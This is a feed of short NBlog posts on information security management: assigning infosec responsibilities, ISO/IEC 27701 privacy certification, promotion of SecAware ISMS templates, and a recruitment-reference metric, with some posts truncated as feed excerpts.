For the next phase of SecAware ISMS, I'm documenting the management process for determining and allocating information risk and security responsibilities. The procedure itself is straightforward - just one page of written instructions covering a simple four-step process - but a raft of examples of the activities various functions perform in relation to information risk and security takes it up to six pages, even though the examples are presented tersely as bullet points.

It turns out there may be several corporate functions, teams and individuals, each performing numerous activities relating to information risk and security. Admittedly, my knowledge in this area has accumulated in the course of working mostly for large, relatively mature organisations, a couple of which had all of the functions staffed by professionals busily performing virtually all of the activities. Small-to-medium sized organisations don't have the luxury of being able to carve up the work among dedicated teams of specialists, so they usually get by with multi-tasking and perhaps assistance from third parties. Information risk and security is tougher for micro-organisations, particularly if they don't even have anyone who appreciates the need to manage information risk and security, privacy, compliance, business continuity etc. The ISO27k framework can help all types and sizes of organization provided it is interpreted and applied sensibly according to the business context and needs.
Even though a multinational bank, say, might have specialists within HR and other functions whose job it is to prepare job descriptions, vacancy notices, training plans etc., our generic list of information risk and security activities may be a useful prompt to confirm that they have all the bases covered. A micro-company will not need to perform every listed activity, and will have no choice but to concentrate on the few that matter most. Either way, the process of management deciding what the necessary activities should involve and, where appropriate, assigning responsibilities to the relevant workers, corporate functions or third parties, is much the same and hence worth laying out in a generic procedure.

As I'm drafting the procedure, I'm itching to mention related aspects such as governance, accountability, access cont

2020-08-07T16:05:08+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/68oSUyc-MLQ/nblog-july-23-infosec-roles.html

NBlog July 31 - who's for a Pimms?

Within a year or so, organisations will be able to have their Privacy Information Management Systems certified compliant with ISO/IEC 27701, thanks to a new accreditation standard ISO/IEC TS 27006 part 2, currently in draft.

A PIMS is very similar to an Information Security Management System, hence compliance auditing and certification are also very similar – so much so that I've heard some certification bodies are already taking the initiative by issuing PIMS certificates despite their not being formally accredited for that.

Potentially, a PIMS certificate may become the generally-accepted means of demonstrating an organisation's due care over privacy and personal data protection – a way to assure data subjects, business partners, the authorities and courts that they have, in fact, adopted good privacy practices.
A PIMS should materially reduce an organisation's risk of suffering privacy breaches. However, as with an ISMS, 'materially reduce' is not quite the same as 'eliminate'. In the less likely event that a privacy breach occurs, despite having a PIMS, compliance certificates for the organisation and if appropriate its information service suppliers (e.g. cloud or marketing services) may be a credible part of the organisation's legal defence against prosecution under GDPR or other privacy laws and regs, but they would still need to explain why the breach occurred and what they have fixed to prevent a recurrence. The PIMS should at least structure the response to the breach, including corrective actions addressing the root causes, hence there should be something substantial behind the usual vacuous PR statements about 'taking this matter very seriously'.

2020-07-31T08:58:07+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/Z1_bB-FdNjM/nblog-july-31-whos-for-pimms.html

NBlog July 29 - boost your ISO27k ISMS with SecAware Take-off

SecAware ISMS Launchpad comprises a set of templates for the mandatory documentation that every compliant Information Security Management System must have: a basic ISMS strategy, scope, Statement of Applicability, Risk Treatment Plan, information security policy, that sort of thing. If your organisation only needs an ISO/IEC 27001 certificate, this tidy stack of templates forms a stable, compliant platform from which to launch your ISMS. For a paltry $99, download Launchpad and get started today!

Hot on its tail, today we announce the next phase of our mission to convince every organisation to manage its information risks properly.

If your organisation sees the value in going a little beyond the bare minimum, SecAware ISMS Take-off takes you to the next stage.
Take-off provides all of these:

The Take-off materials primarily concern management. An ISO27k ISMS is, after all, a management system.

Template #2 "Strategic objectives for information risk and security management" for instance specifies:

- "Enhance and protect the value of information by ensuring adequate confidentiality, integrity and availability"
- "Manage (i.e. identify, evaluate, treat and monitor) information risks cost-effectively and competently"

... plus four other key objectives. It also lays out four n

2020-07-29T14:10:44+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/Ubbg_QqiMw0/nblog-july-29-boost-your-iso27k-isms.html

NBlog July 28 - an interesting risk metric

We were chatting over coffee this morning about an organisation that is recruiting at the moment. Having been through the cycle of advertising, preselecting/long-listing, interviewing and short-listing candidates, their references came back negative, forcing the organisation to reboot the recruitment process.

On the one hand, that's a disappointing and somewhat costly outcome. It suggests, perhaps, that the preselection and interviewing steps could be tightened up. Were there warning signs - yellow or red flags that could/should have been spotted earlier in the process?

On the other, it also indicates that the selection/recruitment process is effectively identifying and weeding out unsuitable applicants, avoiding what could have turned out to be even costlier incidents down the line if the appointments had been made and the new recruits had turned out to be unsuitable.

So, 'Proportion of shortlisted candidates rejected as a result of poor references' is one of several possible measures of the recruitment process, with implications for risks and opportunities, costs and benefits.
Very high or low values of the metric, or adverse trends, or sudden changes, may all be cause for concern and worthy of investigation, whereas middling, "neutral" values are to be expected.

The metric probably wouldn't have even occurred to me except that I happen to be documenting information security controls for joiners, movers and leavers at the moment for the next phase of SecAware ISMS templates. Information risks should be taken into account during the recruitment process. Confirming applicants' identities, taking up references, confirming employment histories and qualifications on their CVs, and running other background checks (e.g. for criminal records or credit issues) can be important controls if legally permissible, especially for appointments to trusted roles - and, by the way, that includes internal transfers and promotions as well as new recruits.

2020-07-28T13:38:59+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/H03yFlnmtl8/nblog-july-28-interesting-risk-metric.html